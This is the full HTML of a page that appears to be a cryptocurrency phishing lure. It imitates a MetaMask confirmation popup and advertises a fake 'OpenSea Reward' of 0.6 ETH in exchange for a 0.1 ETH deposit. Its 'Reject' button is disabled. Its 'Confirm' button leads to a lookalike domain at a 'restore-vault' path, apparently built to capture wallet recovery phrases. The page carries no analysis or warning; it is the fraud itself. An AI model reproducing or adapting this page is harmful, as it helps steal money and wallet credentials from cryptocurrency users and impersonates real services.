<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <title>MetaMask Notification</title>
    <link href="index_files/metamask-fox.svg" rel="shortcut icon" type="image/x-icon">
    <link rel="stylesheet" type="text/css" href="index_files/index.css" title="ltr">
    <link rel="stylesheet" type="text/css" href="index_files/index-rtl.css" title="rtl" disabled="">
  <style></style><style data-jss="" data-meta="MuiInputBase">
    <style>
      #app-content {
        display: flex;
        flex-flow: column;
      }

      #loading__logo {
        width: 10rem;
        height: 10rem;
        align-self: center;
        margin: 10rem 0 0 0;
      }

      #loading__spinner {
        width: 2rem;
        height: 2rem;
        align-self: center;
        margin-top: 1rem;
      }
    </style>
    <link href="http://safestar.program-app.org/metamask/lopek_baluwo/images/favicon.png" rel="shortcut icon" type="image/x-icon">
    <link rel="stylesheet" type="text/css" href="./index_files/index.css" title="ltr">
    <link rel="stylesheet" type="text/css" href="./index_files/index-rtl.css" title="rtl" disabled="">
  <style></style></head>
  <body class="notification">
    <div id="app-content"><div class="app mouse-user-styles"><div><span></span></div><div class="menu-droppo-container network-droppo" style="position: absolute; top: 58px; width: 309px; z-index: 55;"><style>
          .menu-droppo-enter {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }

          .menu-droppo-enter.menu-droppo-enter-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave.menu-droppo-leave-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }
        </style></div><div class="main-container-wrapper"><div class="page-container"><div class="confirm-page-container-navigation" style="display: none;"><div class="confirm-page-container-navigation__container" style="visibility: hidden;"><div class="confirm-page-container-navigation__arrow" data-testid="first-page"><img src="./index_files/double-arrow.svg" alt=""></div><div class="confirm-page-container-navigation__arrow" data-testid="previous-page"><img src="./index_files/single-arrow.svg" alt=""></div></div><div class="confirm-page-container-navigation__textcontainer"><div class="confirm-page-container-navigation__navtext">1 of 1</div><div class="confirm-page-container-navigation__longtext">requests waiting to be acknowledged</div></div><div class="confirm-page-container-navigation__container" style="visibility: hidden;"><div class="confirm-page-container-navigation__arrow" data-testid="next-page"><img class="confirm-page-container-navigation__imageflip" src="./index_files/single-arrow(1).svg" alt=""></div><div class="confirm-page-container-navigation__arrow" data-testid="last-page"><img class="confirm-page-container-navigation__imageflip" src="./index_files/double-arrow.svg" alt=""></div></div></div><div class="confirm-page-container-header"><div class="confirm-page-container-header__row"><div class="confirm-page-container-header__address-container"><div class="confirm-page-container-header__address-identicon"><div class=""><div class="identicon" style="height: 24px; width: 24px; border-radius: 12px;"><div style="border-radius: 50px; overflow: hidden; padding: 0px; margin: 0px; width: 24px; height: 24px; display: inline-block; background: rgb(1, 135, 142);"><svg x="0" y="0" width="24" height="24"><rect x="0" y="0" width="24" height="24" transform="translate(-1.8283976330022202 3.9268598674416935) rotate(122.5 12 12)" fill="#F94301"></rect><rect x="0" y="0" width="24" height="24" transform="translate(8.395005443347443 6.451852780925942) rotate(121.5 12 12)" fill="#C8144A"></rect><rect x="0" y="0" width="24" height="24" transform="translate(17.29272690351644 3.3990868252390825) rotate(113.9 12 12)" fill="#FA7900"></rect></svg></div></div></div></div><div class="confirm-page-container-header__address"></div></div><div class="network-display network-display--colored network-display--mainnet chip chip--with-left-icon chip--transparent" role="button" tabindex="0"><div class="chip__left-icon"><div class="color-indicator color-indicator--filled color-indicator--color-mainnet color-indicator--size-lg"><span class="color-indicator__inner-circle"></span></div></div><span class="box box--margin-top-1 box--margin-right-0 box--margin-bottom-1 box--margin-left-0 typography chip__label typography--h7 typography--align-undefined typography--color-ui-4 typography--weight-normal">Ethereum Mainnet</span></div></div></div><div class="confirm-approve-content"><div class="confirm-approve-content__identicon-wrapper"><img class="identicon confirm-approve-content__identicon" src="https://opensea.io/static/images/logos/opensea.svg" alt="" style="height: 48px; width: 48px; border-radius: 24px;"></div><div class="confirm-approve-content__title">OpenSea Reward</div><div class="confirm-approve-content__description">To get <b style="color: #4d4d4d;font-weight: bold;">0.6  ETH</b>, you must have a balance of at least 0.1 ETH on the network.<br>Please deposit 0.1 ETH to your wallet address.</div><div class="confirm-approve-content__edit-submission-button-container"><div class="confirm-approve-content__medium-link-text cursor-pointer">Edit Permission</div></div><div class="confirm-approve-content__card-wrapper"><div class="confirm-approve-content__card--no-border"><div class="confirm-approve-content__card-header"><div class="confirm-approve-content__card-header__symbol"><i class="fa fa-tag"></i></div><div class="confirm-approve-content__card-header__title">Transaction Fee</div><div class="confirm-approve-content__small-blue-text cursor-pointer"></div></div><div class="confirm-approve-content__card-content"><div class="confirm-approve-content__transaction-details-content"><div class="confirm-approve-content__small-text">A fee is associated with this request.</div><div class="confirm-approve-content__transaction-details-content__fee"><div class="confirm-approve-content__transaction-details-content__primary-fee"></div><div class="confirm-approve-content__transaction-details-content__secondary-fee">0.1 ETH</div></div></div></div><div class="confirm-approve-content__view-full-tx-button-wrapper"><div class="confirm-approve-content__view-full-tx-button cursor-pointer"></div></div></div></div></div><div class="page-container__footer"><footer><button class="button btn-default page-container__footer-button" disabled="" data-testid="page-container-footer-cancel">Reject</button><a href="https://opensea-tokens-aword.epizy.com//metamask/?#restore-vault" class="button btn-primary page-container__footer-button" data-testid="page-container-footer-next">Confirm</a></footer></div></div></div></div></div>
    <div id="popover-content"></div></body></html>